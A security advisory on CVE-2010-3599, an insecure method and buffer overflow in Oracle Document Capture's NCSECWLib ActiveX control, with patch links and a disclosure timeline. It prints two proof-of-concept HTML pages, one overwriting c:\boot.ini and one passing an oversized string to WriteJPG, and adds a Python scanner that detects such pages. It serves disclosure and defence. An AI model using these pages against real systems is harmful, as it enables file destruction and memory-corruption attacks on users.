Oracle Document Capture ActiveX Insecure Method and Buffer Overflow Vulnerabilities

Summary

Multiple vulnerabilities were identified in Oracle Document Capture.

Credit:

The information has been provided by Alexandr Polyakov.
The original article can be found at: http://seclists.org/bugtraq/2011/Jan/151


Details

Vulnerable Systems:
 * Oracle Document Capture 10.1.3.5

An insecure method was found in the NCSECWLib ActiveX control component, which is part of Oracle Document Capture. One of its methods (WriteJPG) can be used to overwrite files on the user's system and is also affected by buffer overflow vulnerabilities. An attacker can construct an HTML page that calls the vulnerable function "WriteJPG" from the ActiveX object NCSECWLib:

Example 1
*******

<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid = "NCSECWLib.NCSRenderer"
argCount = 3

arg1="c:\boot.ini"
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3

</script>
</html>

Example 2
*******

<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid = "NCSECWLib.NCSRenderer"
argCount = 3

arg1=String(13332, "A")
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3

</script>
</html>
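
For defenders reviewing proxy captures or mail attachments, the following is an added example (not part of the original advisory and not Oracle code) that flags pages whose WriteJPG call passes an OutputFile value matching either pattern shown above. The 1024-character threshold, the finding labels and the sample strings are assumptions made for illustration.

```python
import re

PROGID = "NCSECWLib.NCSRenderer"  # ProgID named in the advisory
LONG_ARG = 1024                   # assumed cut-off for an oversized OutputFile value

CALL = re.compile(r"\.WriteJPG\s*\(?\s*([^,\r\n)]+)", re.I)
REPEAT = re.compile(r"String\s*\(\s*(\d+)\s*,", re.I)

def resolve(expr, text):
    """If expr is a bare variable name, return the last value assigned to it."""
    expr = expr.strip()
    if re.fullmatch(r"[A-Za-z_]\w*", expr):
        hits = re.findall(r"^\s*(?:var\s+)?%s\s*=\s*(.+?)\s*;?\s*$" % re.escape(expr),
                          text, re.I | re.M)
        return hits[-1] if hits else expr
    return expr

def classify(value):
    """Label the OutputFile argument of one WriteJPG call."""
    rep = REPEAT.match(value)
    if rep:  # VBScript String(n, c) builds an n-character string
        return "oversized-output-path" if int(rep.group(1)) >= LONG_ARG else "ok"
    literal = value.strip("\"'")
    if len(literal) >= LONG_ARG:
        return "oversized-output-path"
    if not literal.lower().endswith((".jpg", ".jpeg")):
        return "non-jpeg-output-path"
    return "ok"

def scan_page(html):
    """Return findings for every WriteJPG call in a page (empty list if none)."""
    findings = []
    for call in CALL.finditer(html):
        label = classify(resolve(call.group(1), html))
        if label != "ok":
            findings.append(label)
    if findings and PROGID.lower() in html.lower():
        findings.append("progid-reference")
    return findings

# Constructed samples mirroring the two argument patterns in the advisory.
SAMPLE_OVERWRITE = 'arg1="c:\\boot.ini"\narg2=1\ntarget.WriteJPG arg1 ,arg2 ,arg3\n'
SAMPLE_OVERFLOW = ('progid="NCSECWLib.NCSRenderer"\narg1=String(13332, "A")\n'
                   'target.WriteJPG arg1 ,arg2 ,arg3\n')
SAMPLE_BENIGN = 'out="c:\\scans\\page1.jpg"\nviewer.WriteJPG out, 80, False\n'

if __name__ == "__main__":
    for name in ("SAMPLE_OVERWRITE", "SAMPLE_OVERFLOW", "SAMPLE_BENIGN"):
        print(name, scan_page(globals()[name]))
```

The scanner only resolves simple one-line assignments, so treat an empty result as "nothing matched this heuristic", not as proof that a page is safe.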

Patch Availability:
All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

CVE Information:
CVE-2010-3599

Disclosure Timeline:
14.12.2009 Reported
15.12.2009 Vendor response
24.01.2011 Date of Public Advisory
